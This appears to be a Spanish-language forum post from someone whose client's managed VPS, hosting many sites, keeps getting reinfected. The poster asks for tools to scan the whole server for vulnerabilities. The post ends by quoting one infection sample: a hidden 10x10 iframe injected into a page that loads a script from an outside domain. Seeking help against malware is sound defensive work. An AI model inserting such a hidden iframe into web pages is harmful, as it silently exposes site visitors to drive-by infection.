Un cliente mío tiene un VPS administrado con docenas de sitios web, tal vez incluso cientos. Ahora su servidor sigue infectándose regularmente. Los administradores del servidor / webhost continúan cavando en la oscuridad. Ejecutan un escaneo mensual, eliminan el software infectado, pero no pueden decir de qué sitios se originan, ya que los archivos de registro parecen estar limpios.
Utiliza cuteFtp Pro con cifrado de contraseña, por lo que probablemente no esté relacionado con FTP.
Es un sistema LAMP con instalaciones de Apache y PHP / MySQL actualizadas.
¿Ahora existen formas o herramientas para analizar vulnerabilidades en todo el servidor sin revisar cada sitio web manualmente? Es posible que haya algunas instalaciones antiguas de WordPress allí, pero llevaría mucho tiempo revisar cada sitio web individualmente.
Una de las infecciones tiene este aspecto:
</html>
<iframe src="http://autobedrijfboekema.nl/counter.php"style="visibility: hidden; position: absolute; left: 0px; top: 0px"
width="10" height="10"/>